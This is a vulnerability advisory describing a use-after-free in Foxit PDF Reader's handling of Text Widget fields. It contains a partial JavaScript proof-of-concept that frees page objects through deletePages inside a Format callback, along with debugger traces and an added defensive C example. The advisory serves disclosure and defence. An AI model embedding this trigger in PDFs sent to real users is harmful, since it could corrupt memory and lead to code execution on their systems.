A use-after-free vulnerability exists in the way Foxit Reader handles a Text Widget field object. Specially crafted JavaScript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site while the browser plugin extension is enabled.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Foxit Reader 2025.2.0.33046
Foxit Reader - https://www.foxitsoftware.com/pdf-reader/
8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-416 - Use After Free
Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.
JavaScript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles a Text Widget object. This can be illustrated by the following proof-of-concept code:
function main() {
    app.activeDocs[0].getField('Text Field1').setFocus();
    [..]
    app.activeDocs[0].pageNum = 3;
    app.activeDocs[0].pageNum = 3;
}
function delete_pages() {
    app.activeDocs[0].deletePages();
}
[..]
function trigger_delete() {
    getField("txt5").setAction("Format",'delete_pages();');
    app.activeDocs[0].getField('Radio Button0').checkThisBox(true);
    app.activeDocs[0].getField("Radio Button0").setFocus();
    getField("txt5").setAction("Calculate",'main();');
    [...]
}
In the above code, when the page is set to 4 (index starts at 0) in the main function, the trigger_delete function is called. The trigger_delete function assigns a callback to the Format event, which is immediately triggered by a call to setFocus. Inside the callback, a call to deletePages is made, which in turn frees all objects associated with the page. The use-after-free vulnerability occurs when an object is freed by deletePages() and subsequently accessed without any validation. We can observe the following in the debugger (with PageHeap enabled):
0:000> g
malloc
FoxitPDFReader!safe_vsnprintf+0x337ca7:
00007ff6`61166ec7 b948000000 mov ecx,48h ;<------------------(1)
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cac:
00007ff6`61166ecc e87f882c00 call FoxitPDFReader!safe_vsnprintf+0x600530 (00007ff6`6142f750) ;<------------------(2)
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cb1:
00007ff6`61166ed1 488985d8000000 mov qword ptr [rbp+0D8h],rax ss:00000020`9cef8668=000001667eaaafb0
0:000> dd rax ;<------------------(3)
00000166`286a2fb0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000166`286a2fc0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000166`286a2fd0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000166`286a2fe0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000166`286a2ff0 c0c0c0c0 c0c0c0c0 d0d0d0d0 d0d0d0d0
00000166`286a3000 ???????? ???????? ???????? ????????
00000166`286a3010 ???????? ???????? ???????? ????????
00000166`286a3020 ???????? ???????? ???????? ????????
The vulnerable object is created by calling a function at (2), and the size of the object is passed to the function at (1). After allocation, the vulnerable object is examined at (3).
0:000> g
free
FoxitPDFReader!safe_vsnprintf+0x33a791:
00007ff6`611699b1 488bcf mov rcx,rdi ; <----------------- (4)
0:000> dd rdi
00000166`286a2fb0 00000002 00000000 72e40ed0 00000166
00000166`286a2fc0 7eaaafb0 00000166 00000000 00000000
00000166`286a2fd0 17865ff0 00000166 00000000 00000001
00000166`286a2fe0 00000000 00000008 00000000 c0c0c0c0
00000166`286a2ff0 00000000 00000000 d0d0d0d0 d0d0d0d0
00000166`286a3000 ???????? ???????? ???????? ????????
00000166`286a3010 ???????? ???????? ???????? ????????
00000166`286a3020 ???????? ???????? ???????? ????????
0:000> p
FoxitPDFReader!safe_vsnprintf+0x33a794:
00007ff6`611699b4 e8775e2c00 call FoxitPDFReader!safe_vsnprintf+0x600610 (00007ff6`6142f830) ; <----------------- (5)
0:000> p
FoxitPDFReader!safe_vsnprintf+0x33a799:
00007ff6`611699b9 49c7042400000000 mov qword ptr [r12],0 ds:00000020`9cefac38=00000166286a2fb0
0:000> dd 00000166286a2fb0 ; <----------------- (6)
00000166`286a2fb0 ???????? ???????? ???????? ????????
00000166`286a2fc0 ???????? ???????? ???????? ????????
00000166`286a2fd0 ???????? ???????? ???????? ????????
00000166`286a2fe0 ???????? ???????? ???????? ????????
00000166`286a2ff0 ???????? ???????? ???????? ????????
00000166`286a3000 ???????? ???????? ???????? ????????
00000166`286a3010 ???????? ???????? ???????? ????????
00000166`286a3020 ???????? ???????? ???????? ????????
0:000> p
FoxitPDFReader!safe_vsnprintf+0x33a7a1:
00007ff6`611699c1 41c6859100000001 mov byte ptr [r13+91h],1 ds:00000166`72e40f61=01
Later, when the JavaScript API deletePages() is called, it frees all the objects associated with the page. It invokes CPDF_InterForm::DeleteField, which frees the vulnerable object. The register rdi at (4) contains the vulnerable object. The method called at (5) frees the object, and the content of the object is examined at (6) after the free operation.
The vulnerable object is later used without any validation. This can be observed in a debugger at the time of the crash:
0:000> g
(19d0.1904): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
FoxitPDFReader!safe_vsnprintf+0x34d4c6:
00007ff6`6117c6e6 4c8b4108 mov r8,qword ptr [rcx+8] ds:00000166`286a2fb8=???????????????? ;<------------------ (7)
0:000> u
FoxitPDFReader!safe_vsnprintf+0x34d4c6:
00007ff6`6117c6e6 4c8b4108 mov r8,qword ptr [rcx+8]
00007ff6`6117c6ea 488bda mov rbx,rdx
00007ff6`6117c6ed 488b5110 mov rdx,qword ptr [rcx+10h]
00007ff6`6117c6f1 488bcb mov rcx,rbx
00007ff6`6117c6f4 e827b5ffff call FoxitPDFReader!safe_vsnprintf+0x348a00 (00007ff6`61177c20)
00007ff6`6117c6f9 488bc3 mov rax,rbx
00007ff6`6117c6fc 4883c430 add rsp,30h
00007ff6`6117c700 5b pop rbx
0:000> dd rcx
00000166`286a2fb0 ???????? ???????? ???????? ????????
00000166`286a2fc0 ???????? ???????? ???????? ????????
00000166`286a2fd0 ???????? ???????? ???????? ????????
00000166`286a2fe0 ???????? ???????? ???????? ????????
00000166`286a2ff0 ???????? ???????? ???????? ????????
00000166`286a3000 ???????? ???????? ???????? ????????
00000166`286a3010 ???????? ???????? ???????? ????????
00000166`286a3020 ???????? ???????? ???????? ????????
0:000> kb
# RetAddr : Args to Child : Call Site
00 00007ff6`624da5b8 : 00000000`00000000 00000166`170fcfb0 00000166`7307ef50 00007ff6`6117d0f1 : FoxitPDFReader!safe_vsnprintf+0x34d4c6
01 00007ff6`60ddca2d : 00000166`00000000 00000000`00000002 00000166`191ecfb0 00000020`9cefbe69 : FoxitPDFReader!safe_vsnprintf+0x16ab398
02 00007ff6`60dcffc8 : 00000166`286a2f01 00000166`ffffffff 00000166`286a2fb0 00000166`286a2fb0 : FoxitPDFReader!std::basic_streambuf<char,std::char_traits<char> >::pubimbue+0xf3c4d
03 00007ff6`6117aff6 : 00007ff6`66444cc4 00000000`00000001 00000020`9cefbf80 00000166`171f3fe0 : FoxitPDFReader!std::basic_streambuf<char,std::char_traits<char> >::pubimbue+0xe71e8
04 00007ff6`625682d6 : 00000166`286a2fb0 00000000`00000000 00000166`00000000 00007ff6`624c0a01 : FoxitPDFReader!safe_vsnprintf+0x34bdd6
05 00007ff6`625410e3 : 00000166`03f70f01 00000000`00000000 00000166`26510ff0 00000166`26510ff0 : FoxitPDFReader!safe_vsnprintf+0x17390b6
06 00007ff6`62a24d79 : 00000166`03ce6ff0 00000020`9cefc190 00000166`26510ff0 00000166`03f70fe0 : FoxitPDFReader!safe_vsnprintf+0x1711ec3
07 00007ff6`62faab76 : 00000166`18a001a8 00000020`9cefc100 00000233`001b832d 00000020`9cefc1f8 : FoxitPDFReader!FXJSE_GetClass+0x3d9
08 00007ff6`62fa8e31 : 00000233`000a033d 00000166`2d704000 00000233`001801a1 00000233`00000069 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3074b6
09 00007ff6`62fa8e31 : 00000233`001d160d 00000233`001f01a1 00000233`001f01e1 00000233`00000069 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x305771
0a 00007ff6`62fa6560 : 00000233`001d160d 00000233`00000775 00000233`001f01a1 00000000`0000001a : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x305771
0b 00007ff6`62fa60b7 : 00000020`9cefdcd8 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x302ea0
0c 00007ff6`62a7b08f : 00000020`9cefc5bc 00000020`9cefc4a9 00000020`9cefc628 00000000`00000005 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3029f7
0d 00007ff6`62a7ab34 : 00000020`9cefc628 00000166`2d704000 00000233`001e0005 00000166`2d70d110 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x559cf
0e 00007ff6`62a5aa2b : 00000166`2d7042b0 00000020`9cefc6d0 00000166`2d756a50 00000166`18a00100 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x55474
0f 00007ff6`62a5a791 : 00000166`18a00130 00000166`18a000f8 00000166`2d704000 00000166`46af4fc0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3536b
10 00007ff6`62a22756 : 00000166`737e6ff0 00000166`18a00130 00000166`18a000f8 00000166`737e6ff0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x350d1
11 00007ff6`62a2369b : 00000166`18a00130 00000166`737e6ff0 00000166`11687ea0 00000166`18a00100 : FoxitPDFReader!FXJSE_Runtime_Release+0x1126
12 00007ff6`624d9bed : 00000000`00000000 00000166`0bff3fb8 00000166`0bff3fb8 00000166`0bff3fb0 : FoxitPDFReader!FXJSE_ExecuteScript+0x27b
13 00007ff6`624c2349 : 00000166`00000009 00000000`00000002 00000020`9cefca90 00000020`9cefca28 : FoxitPDFReader!safe_vsnprintf+0x16aa9cd
14 00007ff6`6012d596 : 00007ff6`624c2220 00000020`9cefca90 00000166`19a99ba0 00000166`7cb83f20 : FoxitPDFReader!safe_vsnprintf+0x1693129
15 00007ff6`6012c328 : 00000166`19a9bff0 00000166`19a9bff0 00000166`19a99ba0 00000000`00000000 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a7f46
16 00007ff6`6012b3ff : 00000166`275a2f90 00000166`19a9bff0 00000000`0000000a 00000166`7706afd0 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a6cd8
17 00007ff6`5fa3ec00 : 00000166`275a2f90 00000166`275a2f90 00000166`7706afd0 00007ff6`6012b320 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a5daf
18 00007ff6`5fa48a8a : 00000166`23623ff0 00000166`1199dfb0 00000166`265cbfc0 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x806f0
19 00007ff6`5fa48907 : 00000166`19a9bff0 00000000`00000003 00000020`9cefcd90 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x8a57a
1a 00007ff6`5fa48679 : 00007ff6`5fa48670 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x8a3f7
1b 00007ff6`645935a2 : 00000000`00000032 00007ff6`6459d1e7 00000000`00000096 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x8a169
1c 00007ff6`64594aaf : 00000166`10405a20 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18efee2
1d 00007ff6`6458d9d4 : 00000000`00000000 00000166`51fa2eb8 00000000`00000000 00000000`00000432 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18f13ef
1e 00007ff6`6458e494 : 00000000`00000432 00000000`000406de 00000000`00000000 00000000`00000418 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18ea314
1f 00007ffd`3188ef5c : 00000000`00000001 00000000`00000003 00000000`000406de 00000000`000406de : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18eadd4
20 00007ffd`3188e684 : 00000000`00000000 00007ff6`6458e440 00000020`9cc32800 00000166`4f793a80 : USER32!UserCallWinProcCheckWow+0x50c
21 00007ff6`60309004 : 00007ff6`6458e440 00000000`00000ba4 00000000`00000033 00000000`00000000 : USER32!DispatchMessageWorker+0x494
22 00007ff6`625dd404 : 00000166`086a4ff0 00000166`0bc30ff0 00000166`7cc7bd60 00007ff6`624c1c5f : FoxitPDFReader!CryptUIWizExport+0x21e94
23 00007ff6`625849da : 00000166`2b4a4fe0 00000000`00000000 00000020`9cefd2d0 00000166`7cc7bd60 : FoxitPDFReader!safe_vsnprintf+0x17ae1e4
24 00007ff6`62a251c4 : 00000166`2d704000 00000166`0bc30ff0 00000166`0abe2ff0 00000166`2b4a4fe0 : FoxitPDFReader!safe_vsnprintf+0x17557ba
25 00007ff6`62abe2b2 : 00000166`18a000e8 00000020`9cefdba8 00000020`9cefd320 00000020`9cefdb88 : FoxitPDFReader!FXJSE_GetClass+0x824
26 00007ff6`62ad6492 : 00000166`18a02000 00000020`9cefd539 00000020`9cefdb90 00000166`18a000e8 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x98bf2
27 00007ff6`62ad616d : 00000020`9cefdba8 00000166`18a02000 00000020`9cefdba8 00000166`10c92ff0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb0dd2
28 00007ff6`62ad6b4b : 00000166`2d704000 00000166`18a000e0 00000166`18a02000 00000166`18a000e8 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb0aad
29 00007ff6`62ad60fd : 00000020`9cefdba8 00000020`9cefd801 00000020`9cefdba8 00007ff6`5f580000 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb148b
2a 00007ff6`62ad5d2d : 00000233`0009fcdd 00000002`00098101 00000166`2d704000 00000233`001b3e75 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb0a3d
2b 00007ff6`631aeac8 : 00000000`00000001 00000020`9cefdb01 00000020`9cefd970 00000000`00000044 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb066d
2c 00007ff6`631a5b6c : 00000166`18a02000 00000166`18a02000 00000166`00000003 00007ff6`631a4020 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x50b408
2d 00007ff6`63054a7e : 00007ff6`631a5940 00000233`001d1675 00000000`00000044 00000166`18a000d0 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x5024ac
2e 00007ff6`631414ab : 00000233`001b427d 00000233`0009fcdd 00000233`00000069 ffffffff`fffffffe : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3b13be
2f 00007ff6`62fa8e31 : 00000233`001eb625 00000233`0009ecf1 00000233`00000085 00000233`001d1675 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x49ddeb
30 00007ff6`62fa8e31 : 00000233`001d160d 00000233`001eb545 00000233`001eb595 00000233`00000069 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x305771
31 00007ff6`62fa6560 : 00000233`001d160d 00000233`00000775 00000233`001eb545 00000000`0000001a : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x305771
32 00007ff6`62fa60b7 : 00000000`00000000 00000000`00000000 00000000`00000002 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x302ea0
33 00007ff6`62a7b08f : 00000020`9cefdf9c 00000020`9cefde89 00000020`9cefe008 00000000`00000005 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3029f7
34 00007ff6`62a7ab34 : 00000020`9cefe008 00000166`2d704000 00000233`001e0005 00000166`2d70d110 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x559cf
35 00007ff6`62a5aa2b : 00000166`2d7042b0 00000020`9cefe0b0 00000166`2d756a50 00000166`18a00020 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x55474
36 00007ff6`62a5a791 : 00000166`18a00050 00000166`18a00018 00000166`2d704000 00000166`46af4fc0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3536b
37 00007ff6`62a22756 : 00000166`19046ff0 00000166`18a00050 00000166`18a00018 00000166`19046ff0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x350d1
38 00007ff6`62a2369b : 00000166`18a00050 00000166`19046ff0 00000166`474ece80 00000166`18a00020 : FoxitPDFReader!FXJSE_Runtime_Release+0x1126
39 00007ff6`624d9bed : 00000000`00000000 00000166`254dafb8 00000166`254dafb8 00000166`254dafb0 : FoxitPDFReader!FXJSE_ExecuteScript+0x27b
3a 00007ff6`6012d4b5 : 00000166`00000003 00000000`00000002 00000020`9cefe480 00000020`9cefe3c0 : FoxitPDFReader!safe_vsnprintf+0x16aa9cd
3b 00007ff6`6012c063 : 00000166`19a9bff0 00000020`9cefe430 00000000`00000000 00000166`0fc50fb0 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a7e65
3c 00007ff6`6012a6b6 : 00007ff6`6012a5e0 00000166`19a9bff0 00000166`6d83ed00 00000000`00000000 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a6a13
3d 00007ff6`5f7a38b9 : 00007ff6`6012a5e0 00000020`9cefe570 00000166`23673dc8 00000166`7706afd0 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a5066
3e 00007ff6`5fa2dc4e : 00000000`00000000 00000000`00020748 00000166`0fc50fb0 00000020`9cefe5b0 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x78f9
3f 00007ff6`645935a2 : 00000000`000001a9 00000000`00000001 00007ff6`5fa2dbd0 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x6f73e
40 00007ff6`64594aaf : 00000166`2697bcb0 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18efee2
41 00007ff6`6458d9d4 : 00000000`00000000 00000166`51fa2eb8 00000000`00000000 00000000`00000429 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18f13ef
42 00007ff6`6458e494 : 00007ff6`6717d048 00000000`00020748 00000166`51fa2e78 00007ff6`64584038 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18ea314
43 00007ffd`3188ef5c : 00000000`00000001 00000166`51fa2e20 00000000`00020748 00000000`00020748 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18eadd4
44 00007ffd`3188e684 : 00000000`00000000 00007ff6`6458e440 00000020`9cc32800 00007ff6`64585ce4 : USER32!UserCallWinProcCheckWow+0x50c
45 00007ff6`5f9ad22a : 00007ff6`6458e440 00000166`7689f600 00000000`00000001 00007ff6`6733c190 : USER32!DispatchMessageWorker+0x494
46 00007ff6`5f9ad324 : 00000000`00000001 00007ff6`6733c190 00000000`00000000 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x1593aa
47 00007ff6`64ab5df3 : 00000000`00000001 00007ff6`5f580000 00000000`00000000 00000166`4c01df7c : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x1594a4
48 00007ff6`647f37ba : 00000000`00000001 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1e12733
49 00007ffd`30b27374 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1b500fa
4a 00007ffd`31ddcc91 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
4b 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
0:000> lmDvm FoxitPDFReader
Browse full module list
start end module name
00007ff6`5f580000 00007ff6`68b19000 FoxitPDFReader (export symbols) C:\Program Files\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe
Loaded symbol image file: C:\Program Files\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe
Image path: C:\Program Files\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe
Image name: FoxitPDFReader.exe
Browse all global symbols functions data Symbol Reload
Timestamp: Sat Aug 9 08:45:03 2025 (68976CFF)
CheckSum: 094A2639
ImageSize: 09599000
File version: 2025.2.0.33046
Product version: 2025.2.0.33046
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0000.04b0
Information from resource tables:
CompanyName: Foxit Software Inc.
ProductName: Foxit PDF Reader
InternalName: Foxit Reader.exe
OriginalFilename: FoxitPDFReader.EXE
ProductVersion: 2025.2.0.33046
FileVersion: 2025.2.0.33046
PrivateBuild:
SpecialBuild:
FileDescription: Foxit PDF Reader
LegalCopyright: Copyright © 2004-2025 Foxit Software Inc. All Rights Reserved.
LegalTrademarks:
Comments:
The crash occurs at (7) when the object is dereferenced without any validation. Depending on the memory layout of the process, it may be possible to perform arbitrary read and write operations, which could ultimately be exploited to achieve arbitrary code execution.
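The validation that is missing at (7), shown as a general defensive pattern in an added example (not Foxit's code and not the vendor's patch): callers hold an index-plus-generation handle instead of a raw pointer and re-resolve it after any script-controlled callback returns. All names (field_handle, field_resolve, delete_all_fields, field_set_focus) are hypothetical.

```c
#include <stdint.h>
#include <stdlib.h>
/* Hypothetical model (not Foxit code): fields live in a slot table and callers
 * hold {index, generation} handles instead of raw pointers. */
#define MAX_FIELDS 8

typedef struct { int focused; } field_obj;
typedef struct { field_obj *obj; uint32_t gen; } field_slot;
typedef struct { uint32_t idx, gen; } field_handle;   /* gen == 0: invalid */
typedef void (*script_cb)(void);

static field_slot g_slots[MAX_FIELDS];

/* Allocate a field in the first empty slot; each allocation bumps the slot's
 * generation so handles to a previous occupant stop matching. */
field_handle field_create(void) {
    field_handle h = {0, 0};
    for (uint32_t i = 0; i < MAX_FIELDS; i++) {
        if (g_slots[i].obj) continue;
        g_slots[i].obj = calloc(1, sizeof(field_obj));
        if (!g_slots[i].obj) return h;
        h.idx = i;
        h.gen = ++g_slots[i].gen;
        return h;
    }
    return h;
}

/* Resolve a handle; NULL when the field was freed or its slot was reused. */
field_obj *field_resolve(field_handle h) {
    if (h.gen == 0 || h.idx >= MAX_FIELDS) return NULL;
    field_slot *s = &g_slots[h.idx];
    return (s->obj && s->gen == h.gen) ? s->obj : NULL;
}

/* Stands in for deletePages(): frees every field on the page. */
void delete_all_fields(void) {
    for (uint32_t i = 0; i < MAX_FIELDS; i++) { free(g_slots[i].obj); g_slots[i].obj = NULL; }
}

/* Stands in for setFocus(): runs a script-controlled callback (the Format action
 * in the advisory), then touches the field. Returns 0, or -1 if the field is gone. */
int field_set_focus(field_handle h, script_cb on_format) {
    if (!field_resolve(h)) return -1;
    if (on_format) on_format();          /* may re-enter delete_all_fields() */
    field_obj *f = field_resolve(h);     /* re-validate, never reuse a cached pointer */
    if (!f) return -1;
    f->focused = 1;
    return 0;
}

/* Callback that frees the fields and immediately reallocates into the same slot. */
void cb_delete_and_realloc(void) { delete_all_fields(); (void)field_create(); }

int main(void) {
    field_handle h = field_create();
    return field_set_focus(h, cb_delete_and_realloc) == -1 ? 0 : 1;
}
```

The generation counter matters because a freed slot can be refilled before the caller resumes; a plain NULL check would then accept a different object at the same address.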
2025-10-06 - Vendor Disclosure
2025-12-19 - Vendor Patch Release
2025-12-19 - Public Release
Discovered by KPC of Cisco Talos.